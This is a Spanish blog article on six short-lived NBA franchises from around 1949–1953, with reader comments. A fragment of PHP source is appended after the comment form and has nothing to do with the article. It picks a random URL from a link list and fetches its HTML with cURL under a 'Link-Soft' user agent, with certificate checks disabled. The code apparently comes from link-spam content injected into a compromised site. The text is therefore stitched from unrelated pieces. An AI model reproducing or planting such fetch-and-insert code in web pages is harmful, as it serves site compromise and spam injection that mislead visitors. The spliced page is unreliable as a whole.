“Se me olvidó que te olvidé…” (y III)

16 de February de 2010 por Sergio
Artículo 4 de 9 de la serie Historia de la NBA

Y con los últimos 6 equipos de la lista, damos por finalizado el repaso a los equipos extintos de la NBA. Esperemos que hayáis disfrutado.

10. INDIANAPOLIS JETS

La ciudad de Indianápolis siempre ha tenido una relación especial con el mundo del baloncesto. A lo largo la historia siempre ha aportado un número de equipos a las diferentes competiciones que supera en mucho a ciudades de mayor población que la capital del estado de Indiana. Quizás el hecho de que el estado cuente con la universidad de Indiana State, una de las más potentes de la historia baloncestísticamente hablando, ha tenido algo que ver en todo ello. Empezaremos con los Jets, equipo procedente de la NBL, y renombrado a partir de los Indianápolis Kautskys, que ingresó en la NBA en 1949, siendo, a la postre, la única temporada en el campeonato de la que puede hacer gala. Sus años en la NBL, a pesar de contar casi siempre con buenos balances, nunca se vieron refrendados con la consecución de mayores metas, cayendo siempre en posteriores enfrentamientos de Playoffs. Durante ese único año su balance fue 18-42, tras el cual se decidió la disolución de la entidad y fueron reemplazados por otro equipo de la ciudad, los Indianápolis Olympians, sobre el que hablaremos a continuación. La sede de sus partidos era el Hinckle Fieldhouse, enclavado en el campus de la Universidad de Butler, y con una capacidad de 11.000 espectadores (sentados). Este estadio, a la fecha de su construcción en 1928, era el mayor estadio dedicado a la práctica de baloncesto en todos los EEUU, y continuó siéndolo hasta los años 50.

Curiosidades:

– El equipo entró ese año en la NBA junto a Minneapolis Lakers, Rochester Royals y Fort Wayne Pistons (actuales Los Angeles Lakers, Sacramento Kings y Detroit Pistons), si bien estos, como sabemos, cuentan con un historial mucho mayor que continúa en el presente.

– Cuando el equipo estaba en la NBL contaron con la figura, como jugador, del mítico John Wooden, primera persona en ser nombrado Hall of Fame como jugador y entrenador, y único junto a Lenny Wilkens y Bill Sharman. John Wooden, a pesar de desarrollar la mayoría de su exitosa carrera en la UCLA, comenzó su periplo de entrenador en Indiana State, estado del que procedía.

11. INDIANAPOLIS OLYMPIANS

Tras la extinción de la franquicia de los Jets, los dirigentes deportivos dedicados al baloncesto en Indiana decidieron crear un nuevo equipo que pudiese reemplazar al anterior conjunto de la ciudad. Algunos jugadores como Bruce Hale fueron contratados directamente de la anterior franquicia y usaron también el Hinckle Fieldhouse como lugar para desarrollar sus partidos como locales. Su andadura en la NBA duró 4 años, apareciendo en todos ellos en la postemporada y cosechando un récord acumulado en todas ellas de 132-137 además de la consecución de un título de división. El principio del fin se produjo cuando Alex Groza y Ralph Beard, principales estrellas, fueron suspendidos de por vida al finalizar la temporada 1951 debido a las apuestas ilegales que realizaron durante su estancia universitaria en Kentucky. Estos hecho serían admitidos por ellos mismos. Tras este varapalo, los resultados de la franquicia se vieron seriamente afectados, derivando en la disolución final en 1953.

Curiosidades:

– Los Olympians poseen el récord de haber disputado el partido mas largo de la historia. Fue un 6 de Enero de 1951 en un encuentro que les enfrentaba a los Rochester Royals y que se decidió, tras 6 prórrogas y 78 minutos, por un marcador de 75-73 a favor de los Olympians. Al día siguiente los 5 jugadores del quinteto inicial disputaron los 48 minutos del encuentro frente a los Tri-Cities Blackhawks. Eso sí, este partido sí lo perdieron.

– Alex Groza y Ralph Beard fueron los jugadores principales sobre los que se cimentó la victoria de EEUU en los juegos olímpicos de 1948.

– Alex Groza, dos veces All-star en sus dos temporadas, promedió unos fantásticos 22,5 puntos por partido convirtiéndose en el primer jugador de la historia que conseguía una media superior a los 20 puntos en su último año en activo (Bob Pettit, Paul Arizin y Petrovic fueron los otros) y siendo el jugador con mejor porcentaje de tiro en sus dos temporadas en la élite

12. ANDERSON PACKERS

El tercer equipo en discordia en el estado de Indiana fueron los Packers. Estos tenían su sede en la pequeña ciudad de Anderson y solo aguantaron en liza durante la temporada 1949-50, primera con la denominación NBA, para luego pasarse a la recién creada NPBL (Liga Profesional Nacional de Baloncesto). Ese único año obtuvieron un récord de 37 victorias y 23 derrotas, clasificándose para Playoffs, donde derrotaron a Blackhawks y Olympians por 2-1 para perder en Semifinales contra los Minneapolis Lakers de Mikan. Eran un equipo eminentemente ofensivo en el que hasta 7 jugadores de su plantilla superaban una media de 9 puntos por partido. Los partidos en los que recibían a sus rivales se disputaban en el Anderson High School Wigwam.

Curiosidades:

– El hogar del equipo, el Anderson High School Wigwam, es el segundo gimnasio mas grande de los EEUU con una capacidad de cerca de 9.000 espectadores. De hecho, 9 de los 11 más grandes se sitúan en este mismo estado, lo que refleja la pasión de esta comunidad hacia el deporte y, en particular, hacia el baloncesto.

– Los colores del equipo eran el rojo, blanco y azul.

– Nunca llegaría a debutar en la NPBL por problemas administrativos y económicos, desapareciendo ese mismo año.

– A pesar de ser el equipo con más promedio anotador era el segundo peor en porcentaje de acierto con un 31%. Todo un Run & Gun en el ecuador del siglo.

13. DENVER NUGGETS

Al igual que en el caso de los Baltimore Bullets, los Denver Nuggets actuales escogieron su nombre en homenaje a un equipo original que disputó la temporada 49-50. En 1974 el equipo se llamaba Denver Rockets pero tuvieron que cambiarlo al incorporarse a la NBA puesto que ya existía un equipo con ese nombre en la “cercana” ciudad de Houston. La entidad que murió en 1950 no está ligada en absoluto a los actuales Nuggets. Esta franquicia, que tenía una larga historia de triunfos en las primeras competiciones nacionales desarrolladas desde los años 30 (como la AAU), se vio incluida en la NBL un año antes de su final afiliación a la NBA donde sólo pudo disputar un campeonato con un pobre balance de 11 victorias en 62 partidos. Al desaparecer, la ciudad de Denver se quedó sin equipos profesionales en las grandes ligas hasta la irrupción en 1960 de los conocidos Broncos de Denver. El recinto en el que disputaban sus encuentros era el Denver Arena Auditorium con una capacidad de 12.000 espectadores.

Curiosidades:

– Mo Udall, jugador de los Nuggets, es recordado por su pertenencia a la Cámara de Representantes de los Estados Unidos, una de las dos cámaras del Congreso Norteamericano.

– El Denver Arena Auditorium sirvió tambien de hogar a los posteriores Nuggets entre 1967 y 1975 cuando militaban en la ABA.

14. SHEBOYGAN RED SKINS

Esta entidad fue fundada en 1938 en la pequeña ciudad de Sheboygan, Wisconsin. A pesar de no ser una franquicia recordada y de su breve paso por la NBA (sólo durante el curso 49-50), su historial se expande a las ligas de la NBL y NPBL donde consiguieron títulos en 1942-43 y 1950-51 respectivamente. Los pieles rojas se distinguieron históricamente por su fortaleza defensiva, siendo en 5 ocasiones el equipo al que menos puntos conseguían hacerle en la NBL. Su ratio de victorias durante aquel año fue de 22-40, marca que les valió la cuarta plaza de la división y el acceso a las eliminatorias, donde serían derrotados por los Olympians por 2-1 en primera ronda. El pabellón del equipo era el Sheboygan Municipal Auditorium and Armory con una capacidad para 3.000 personas.

Curiosidades:

– Son el equipo con el menor mercado, población en la ciudad y estadio de la historia de la competición.

– Sus colores eran el rojo vivo y el blanco

– A pesar de su buen comienzo de temporada con un 13-3, incluida una victoria sobre los Lakers de Mikan, las lesiones de sus principales estrellas lastraron sobremanera las posibilidades del equipo de alcanzar cotas más altas.

– Bobby Cook lograría contra los Nuggets una de las más altas anotaciones de aquellos primeros años de competición con 44 puntos.

15. WATERLOO HAWKS

A pesar de su nombre no está emparentado con los actuales Atlanta Hawks, que proceden de los Tri-Cities Blackhawks. Este equipo de la ciudad de Waterloo, Iowa, es el único equipo de este estado que ha jugado en cualquiera de las ligas mayores norteamericanas durante toda la historia. Fueron fundados en 1948, disputando la NBL en aquella temporada y la NBA a la siguiente para acabar desapareciendo como franquicia en la NPBL. Su récord durante aquel año 49-50 fue de 19-43, dejándoles fuera de toda lucha por la consecución del título. Su hogar era el McElroy Auditorium, un pabellón multiusos de alrededor de 5.000 asientos.

Curiosidades:

– Vestían unos curiosos colores blanco, negro y oro

– A pesar de jugar solo 62 partidos en la liga llegaron a contar con hasta 22 jugadores. Ninguno de ellos lideró ningun apartado estadístico.

Comenta

6 comentarios a esta entrada

  1. Kantonyo dice:
    #1

    Por mi parte he disfrutado y he aprendido bastante.

    Lo de Denver Nuggets es pregunta de Trivial Pursuit, creo que muy poca gente conocia que ya había existido un equipo con ese nombre.

      Citar

  2. TheDeerHunter dice:
    #2

    impresionante… de todo esto sí que ya no tenía ni papa…

    y lo de los Denver Nuggets me ha dejado anonadado.

      Citar

  3. sergio dice:
    #3

    Me alegro de que te haya gustando Kantonyo. Espero seguir sorprendiendoos

      Citar

  4. sergio dice:
    #4

    y Deer jaja

      Citar

  5. Dantley2 dice:
    #5

    Gran final ¡¡¡ Leí una vez que los Nuggets se crearon hacía muchas décadas, está claro ahora que es un error y que nada tienen que ver.

    Enhorabuena por el esfuerzo, sin duda ahora sabemos mucho más de lo que sabíamos hace unos días

      Citar

  6. Love Denise dice:
    #6

    muy bueno, se aprende mucho con esta clase de articulos. Los logos de antes son mucho más bonitos y originales que los de ahora.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>